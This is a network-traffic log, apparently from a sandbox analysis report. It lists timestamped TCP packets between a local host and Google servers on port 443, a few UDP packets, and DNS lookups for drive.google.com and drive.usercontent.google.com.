Jan 11, 2025 05:10:18.127362967 CET	443	54069	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:18.470057011 CET	443	54069	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:18.470180035 CET	54069	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:18.470199108 CET	443	54069	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:18.470237970 CET	54069	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:18.470303059 CET	443	54069	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:18.470357895 CET	54069	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:18.470359087 CET	443	54069	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:18.470407963 CET	54069	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:18.470489979 CET	54069	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:18.470506907 CET	443	54069	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:18.488801003 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:18.488851070 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:18.488920927 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:18.489173889 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:18.489192009 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.118896961 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.118957996 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:19.120845079 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:19.120866060 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.121196985 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:19.121203899 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.555529118 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.555665016 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.555723906 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:19.555756092 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.555771112 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:19.555794954 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:19.555794954 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.555838108 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:19.556683064 CET	54070	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:19.556699991 CET	443	54070	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:19.714431047 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:19.714489937 CET	443	54071	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:19.714576960 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:19.714879036 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:19.714889050 CET	443	54071	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:20.360028982 CET	443	54071	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:20.360101938 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:20.360585928 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:20.360616922 CET	443	54071	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:20.360766888 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:20.360781908 CET	443	54071	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:20.748905897 CET	443	54071	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:20.749022007 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:20.749203920 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:20.749274015 CET	443	54071	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:20.749335051 CET	54071	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:20.764601946 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:20.764678955 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:20.764767885 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:20.765022993 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:20.765048027 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.395553112 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.395723104 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.396317959 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.396334887 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.396517038 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.396521091 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.837558985 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.837718964 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.837723017 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.837750912 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.837769985 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.837819099 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.837830067 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.837873936 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.837919950 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.837969065 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.839018106 CET	54072	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:21.839036942 CET	443	54072	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:21.964598894 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:21.964643002 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:21.964744091 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:21.965028048 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:21.965043068 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.604681969 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.604778051 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:22.605784893 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.605870962 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:22.607820988 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:22.607834101 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.608275890 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.608346939 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:22.608793974 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:22.651336908 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.991359949 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.991527081 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:22.991555929 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.991605043 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:22.991717100 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:22.991749048 CET	443	54073	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:22.991795063 CET	54073	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:23.004633904 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:23.004689932 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:23.004770041 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:23.005049944 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:23.005059958 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:23.634468079 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:23.634577990 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:23.635276079 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:23.635287046 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:23.635445118 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:23.635449886 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:24.044022083 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:24.044106960 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:24.044128895 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:24.044156075 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:24.044171095 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:24.044181108 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:24.044189930 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:24.044218063 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:24.044697046 CET	54074	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:24.044713020 CET	443	54074	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:24.167543888 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:24.167587996 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:24.167728901 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:24.167989016 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:24.168008089 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:24.849978924 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:24.850120068 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:24.851067066 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:24.851150036 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:24.853064060 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:24.853072882 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:24.853385925 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:24.853465080 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:24.853873968 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:24.899324894 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:25.737369061 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:25.737488985 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:25.737526894 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:25.737554073 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:25.737590075 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:25.737620115 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:25.737689972 CET	54075	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:25.737725019 CET	443	54075	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:25.751827002 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:25.751876116 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:25.751945972 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:25.752197027 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:25.752239943 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.385366917 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.385526896 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.385917902 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.385929108 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.386106014 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.386111975 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.834455967 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.834575891 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.834606886 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.834633112 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.834662914 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.834671021 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.834681034 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.834726095 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.834734917 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.834767103 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.834800005 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.834842920 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.835298061 CET	54076	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:26.835319042 CET	443	54076	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:26.964569092 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:26.964617014 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:26.964751959 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:26.965106010 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:26.965116024 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:27.598325968 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:27.598491907 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:27.598963022 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:27.598973989 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:27.599201918 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:27.599206924 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:27.980879068 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:27.980937004 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:27.980956078 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:27.981106043 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:27.982146025 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:27.982182026 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:27.982192993 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:27.982228041 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:27.986615896 CET	54077	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:27.986629963 CET	443	54077	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:28.066461086 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:28.066502094 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:28.066648960 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:28.067117929 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:28.067127943 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:28.695880890 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:28.695964098 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:28.696527004 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:28.696533918 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:28.696757078 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:28.696762085 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:29.118328094 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:29.118380070 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:29.118474007 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:29.118474007 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:29.118504047 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:29.118532896 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:29.118554115 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:29.118582010 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:29.119587898 CET	54078	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:29.119605064 CET	443	54078	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:29.249207973 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:29.249257088 CET	443	54079	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:29.249317884 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:29.249996901 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:29.250010967 CET	443	54079	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:29.878350019 CET	443	54079	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:29.878504038 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:29.879251957 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:29.879265070 CET	443	54079	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:29.879435062 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:29.879442930 CET	443	54079	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:30.264271021 CET	443	54079	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:30.264389992 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:30.264419079 CET	443	54079	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:30.264462948 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:30.264538050 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:30.264574051 CET	443	54079	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:30.264666080 CET	54079	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:30.291146040 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:30.291208029 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:30.291280985 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:30.291521072 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:30.291542053 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:30.919533968 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:30.919702053 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:30.920083046 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:30.920093060 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:30.920259953 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:30.920264959 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:31.343997955 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:31.344115019 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:31.344132900 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:31.344183922 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:31.344199896 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:31.344255924 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:31.344278097 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:31.344327927 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:31.344394922 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:31.344448090 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:31.344835043 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:31.344847918 CET	443	54080	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:31.344860077 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:31.344907045 CET	54080	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:31.464447021 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:31.464575052 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:31.464823961 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:31.464982033 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:31.465054989 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.123687983 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.123811960 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.124768972 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.124833107 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.126337051 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.126363993 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.126732111 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.130013943 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.130306005 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.171334982 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.512108088 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.512181044 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.512218952 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.512264013 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.512377024 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.512432098 CET	443	54081	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:32.512485027 CET	54081	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:32.526918888 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:32.526979923 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:32.527048111 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:32.527533054 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:32.527549028 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.175327063 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.175462008 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.176013947 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.176023960 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.176191092 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.176197052 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.606010914 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.606097937 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.606112957 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.606132030 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.606159925 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.606189013 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.606201887 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.606225967 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.606247902 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.606268883 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.606848955 CET	54082	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:33.606868982 CET	443	54082	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:33.730305910 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:33.730374098 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:33.730468035 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:33.730767965 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:33.730791092 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:34.378540993 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:34.378674030 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:34.379290104 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:34.379350901 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:34.380748987 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:34.380767107 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:34.381016970 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:34.381072998 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:34.381328106 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:34.423336983 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:34.768596888 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:34.768723011 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:34.768904924 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:34.769013882 CET	443	54083	142.250.186.174	192.168.2.6
Jan 11, 2025 05:10:34.769079924 CET	54083	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:10:34.789294958 CET	54084	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:34.789334059 CET	443	54084	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:34.789401054 CET	54084	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:34.789669037 CET	54084	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:10:34.789680958 CET	443	54084	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:35.427582026 CET	443	54084	142.250.186.33	192.168.2.6
Jan 11, 2025 05:10:35.427658081 CET	54084	443	192.168.2.6	142.250.186.33

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:08:59.985748053 CET	53	52950	162.159.36.2	192.168.2.6
Jan 11, 2025 05:09:00.461457014 CET	62883	53	192.168.2.6	1.1.1.1
Jan 11, 2025 05:09:00.468581915 CET	53	62883	1.1.1.1	192.168.2.6
Jan 11, 2025 05:09:49.902857065 CET	59281	53	192.168.2.6	1.1.1.1
Jan 11, 2025 05:09:49.910409927 CET	53	59281	1.1.1.1	192.168.2.6
Jan 11, 2025 05:09:51.009299994 CET	52998	53	192.168.2.6	1.1.1.1
Jan 11, 2025 05:09:51.016536951 CET	53	52998	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 05:09:00.461457014 CET	192.168.2.6	1.1.1.1	0x672c	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 11, 2025 05:09:49.902857065 CET	192.168.2.6	1.1.1.1	0xa2d9	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:09:51.009299994 CET	192.168.2.6	1.1.1.1	0x8785	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 05:09:00.468581915 CET	1.1.1.1	192.168.2.6	0x672c	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 11, 2025 05:09:49.910409927 CET	1.1.1.1	192.168.2.6	0xa2d9	No error (0)	drive.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
